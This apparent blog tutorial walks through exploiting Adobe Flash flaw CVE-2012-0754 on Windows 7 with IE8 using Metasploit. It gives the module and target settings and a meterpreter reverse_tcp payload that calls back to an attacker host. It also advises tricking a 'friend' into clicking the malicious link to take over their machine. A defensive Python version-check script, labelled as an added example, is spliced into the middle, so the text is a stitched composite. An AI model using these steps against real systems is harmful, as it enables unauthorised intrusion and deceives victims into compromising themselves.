How to Exploit Adobe Flash with a Corrupted Movie File to Hack Windows 7


Step 1: Search Vulnerabilities

When we go to www.securityfocus.com and search the database for Adobe and then
Flash Player, we get 8 pages of vulnerabilities with 20 vulnerabilities per page. It's
obvious from this listing that Flash is riddled with security problems. We could
spend weeks going through all the Adobe Flash Player vulnerabilities, but I'll leave
that for you to do.

If you are looking to attack a client machine on a network, you would be well-served 
to spend your time focused on Adobe Flash. There are so many vulnerabilities and 
new ones arrive daily!

Step 2: Pick One
Let's take a look at one vulnerability known as CVE-2012-0754, a remote memory corruption vulnerability. It was found in the wild back in February 2012 and involves using a corrupted .mp4 file to create a buffer overflow in Flash that enables the attacker to execute their own code. Note that it works for Adobe Flash Player through 11.1.
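
For defenders, the version range stated above can be turned into an inventory check. The following is an added example, not part of the original article: it parses Flash Player version strings (dotted, or Flash's native `WIN 11,1,102,55` form) from a constructed inventory and flags hosts at or below 11.1 for review. Assumptions: the hostnames, sample versions and function names are made up, and because the article gives no build-level boundary, patched builds within 11.1 are flagged as well.

```python
import re

# Upper bound taken from the article's wording ("through 11.1"). The page gives
# no build-level fix boundary, so this is a coarse triage flag (assumption).
AFFECTED_THROUGH = (11, 1)

# Optional three-letter platform prefix, then 2 to 4 numeric fields separated
# by dots or commas.
_VERSION_RE = re.compile(
    r"^(?:[A-Z]{3}\s+)?(\d+)[.,](\d+)(?:[.,](\d+))?(?:[.,](\d+))?$"
)

def parse_flash_version(raw):
    """Return (major, minor, revision, build), or None if unparseable.

    Accepts dotted ("11.1.102.55") and comma-separated ("WIN 11,1,102,55")
    forms; missing trailing fields are treated as 0.
    """
    m = _VERSION_RE.match(raw.strip())
    if not m:
        return None
    return tuple(int(g) if g is not None else 0 for g in m.groups())

def triage(inventory):
    """Map each host to 'review', 'ok' or 'unknown'."""
    result = {}
    for host, raw in inventory.items():
        version = parse_flash_version(raw) if raw else None
        if version is None:
            # Unparseable is not the same as absent: follow up manually.
            result[host] = "unknown"
        elif version[:2] <= AFFECTED_THROUGH:
            result[host] = "review"
        else:
            result[host] = "ok"
    return result

# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "ws-001": "WIN 11,1,102,55",
    "ws-002": "10.3.183.10",
    "ws-003": "11.2.202.235",
    "ws-004": "not installed",
    "ws-005": "",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{host}: {status}")
```

Hosts marked `review` should be checked against the vendor's bulletin for the exact fixed build before being treated as exposed.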




When we click on the "exploit" tab at the top of the page, it takes us to a link to the exploit. We can then download or copy and paste that exploit for use.

Step 3: Use Metasploit
Let's open Metasploit and find the exploits built to take advantage of the Adobe Flash
Player vulnerabilities. Search for "flash" using the following command.

• msf > search flash

When I do so, I find numerous flash exploits, but I have highlighted the one we are using here and it corresponds to CVE-2012-0754. Now let's use it.

• msf > use exploit/windows/browser/adobe_flash_mp4_cprt

When we do that, it will load the exploit into the console. Now let's get more info on it.

• msf > info

Metasploit returns some basic info on the exploit. I have highlighted the description in the screenshot above. In this info, we can also see that this exploit has "targets". To get the most reliable results, you want to set the target.

In our case here, we are going after Windows 7 with IE8 (remember, IE8 came as default on Windows 7 and is still the most widely used browser with 21.2% of the market), so we set the target to 6.

• msf > set target 6

Step 4: Set Options

Next we need to set our options. We can see the options by typing:

• msf > show options

We need to set the SRVHOST and the payload at a minimum. We could also set the SRVPORT, the URIPATH, and the SSL settings, but we will leave these at their defaults here.

• msf > set SRVHOST 192.168.1.104

• msf > set payload windows/meterpreter/reverse_tcp

Once we set the payload, we once again need to check options as payloads have their own set of options. When we do so, we see that we need to set the LHOST (the IP of our local host) for the meterpreter.

• msf > set LHOST 192.168.1.104

Step 5: Exploit!

With all the parameters we need set, all we need to do is type:

• msf > exploit

This will now generate a corrupted .mp4 file and will host it on the Metasploit web server. Now we need to be creative and send that link to the victim and hope they click on it. For instance, you could send it to a "friend" saying "Hey, check out this great new hack I found on www.example.com"

When they click on it, Metasploit will send the .mp4 file to their browser creating a buffer overflow as seen below.

With a bit of luck (this exploit doesn't work 100% of the time, more like 50%), you will be rewarded with the meterpreter prompt and you will own his or her system!

Hacking into modern operating systems is becoming more and more difficult as Microsoft and other software vendors become more security focused. The vigilant hacker can ALWAYS find a way in, if they are persistent and creative.

1 comment:

  1. We will be getting a reverse TCP connection from the victim machine by using a small backdoor hack windows 7 using metasploit.
